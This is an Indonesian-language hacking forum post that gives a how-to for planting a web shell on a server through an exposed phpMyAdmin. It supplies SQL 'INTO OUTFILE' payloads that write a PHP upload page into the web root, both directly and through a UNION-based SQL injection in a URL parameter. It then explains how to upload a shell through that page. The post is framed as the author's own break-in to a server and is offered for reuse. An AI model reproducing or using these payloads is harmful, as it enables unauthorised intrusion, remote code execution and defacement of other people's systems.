Upload Shell dengan Perintah SQL dari PhpMyAdmin

berawal dari ga sengaja dapet phpmyadmin server windows pengen upload shell tapi ga bisa coz ga bisa load file index di phpmyadminmo deface apa lagi..pkai wget juga g bisa coz server na windows..huwaaa
udah hampir pts asa gk tau hrs di apain..tb2 mncul ide g tau drmn dtng nya..klo emang file index na g bs di bc,,trz g bisa upload shell dr phpmyadmin..kenapa gak coba buat ndri aja hlmn upload na biar bisa upload shell..
hehmm,,,stlh bongkar2 script lama truz ingat2 query sql buat bikin halaman upload via sql akhirnya bisa juga shell na terupload,,
langsung aja langkah2 na.. :
syarat : 1. path www direktori sudah diketahui2. into outfile mode : on
* login k phpmyadmin truz
pilih tab "SQL" masukkan kode :
Quote:
select "

'; move_uploaded_file($_FILES[uploadedfile][tmp_name], basename( $_FILES[uploadedfile][name]));?>" into outfile 'C:/path/to/www/upload.php'Quote:
klo web na vuln sql injection langsung aj inject via browser kyk gini :via sql injection :
Quote:
[Site]/bugs.php?id=-9 union select 1,2,3,"

'; move_uploaded_file($_FILES[uploadedfile][tmp_name], basename( $_FILES[uploadedfile][name]));?>" into outfile 'C:/path/to/www/SHELL.php'
klo udah langsung aja k halaman upload yg tadi kita buat,,path na gini :
Quote:[Site]/phpmyadmin/upload.php
setelah itu upload shell kita dari uploader di atas
klo sukses shell yg kita upload berada di
Quote
:[Site]/phpmyadmin/shell.php